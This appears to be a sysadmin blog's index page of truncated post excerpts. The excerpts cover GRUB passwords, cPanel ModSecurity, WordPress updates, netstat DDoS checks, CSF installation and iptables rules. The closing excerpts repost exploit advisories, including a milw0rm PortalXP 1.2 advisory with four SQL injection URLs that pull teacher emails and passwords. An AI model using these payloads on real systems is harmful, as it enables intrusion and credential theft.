You can set a password for the GRUB bootloader. This prevents users from entering single user mode or changing settings at boot time. When your system is rebooted, grub presents the boot option menu. From this menu one can easily login into a single user mode without the password which might result into compromise system [...]

This is an exclusive! and free! add-on product for cPanel/WHM. The product provides you with an interface to the cPanel mod_security implementation from within WHM. With ConfigServer ModSecurity Control you can: Disable mod_security rules that have unique ID numbers on a global, per cPanel user or per hosted domain level Disable mod_security entirely, also on [...]

You’ll get this error when WordPress automatic update process, via svn or admin, fail or is incomplete. It leaves the file named “.maintenance” on your home or root directory, with info on maintenance. Sample content of .maintenance file: <?php $upgrading = 1282258195; ?> Just delete or rename that file and resume your update process, or [...]

A quick and usefull command for checking if a server is under ddos is: netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n That will list the IPs taking the most amount of connections to a server. It is important to remember that the [...]

Howto install CSF on your server: 1) cd /usr/local/src/ 2) download csf: wget http://www.configserver.com/free/csf.tgz 3) tar -xzf csf.tgz 4) goto the csf directory : cd csf 5) ./install.sh Once it is installed, you can either edit the configuration file from WHM >> Plugins >> “Config Server Security and Firewall” option. If you don’t have WHM/cPanel [...]

WWW caching service by default listen on TCP 8080 port. Following iptables rules allows WEBCACHE incoming client request (open TCP port 8080) for server IP address 202.54.1.20: iptables -A INPUT -p tcp -s 0/0 –sport 1024:65535 -d 202.54.1.20 –dport 8080 -m state –state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -p tcp -s 202.54.1.20 –sport 8080 [...]

Howto open ports using iptables, see the following examples: Open port 25 (SMTP) for the SOURCE_IP address: iptables -A INPUT -p tcp -s SOURCE_IP  –dport 25  -j ACCEPT Open port 22 (SSH) for the SOURCE_IP address to a specific DESTINATION_IP address iptables -A INPUT -p tcp -s SOURCE_IP –dport 22 -d DESTINATION_IP -j ACCEPT More [...]

——————Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities—————————- # # #### # ### ## ### #### #### ### ##### #### #### ### # ### #### ###### ## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # [...]

BASE web page setup Open your favorite web browser and go to: http://www.example.com/base-1.2.5/setup If all is setup okay you should see the BASE Setup Program page: Click on Continue step 1 of 5: Enter the path to ADODB (/var/www/adodb): click on Submit Query step 2 of 5: Enter the needed info on the next screen: [...]

############################################################################## [+] PortalXP – Teacher Edition 1.2 Multiple SQL Injection Vulnerabilities [+] Discovered By SirGod [+] http://insecurity-ro.org [+] http://h4cky0u.org ##############################################################################   [+] Download : http://sourceforge.net/projects/portalxp/files/portalxp%20-%20teacher%20edition/Version%201.2/PortalXP1-2.zip/download [+] SQL Injection – PoC’s http://127.0.0.1/calendar.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher– http://127.0.0.1/news.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher– http://127.0.0.1/links.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher– http://127.0.0.1/assignments.php?assignment_id=1+union+all+select+1,2,3,4,concat_ws(0x3a,email,teacherpass),6,7,8,9+from+teacher– ########################################################################################################################################### # milw0rm.com [2009-08-01]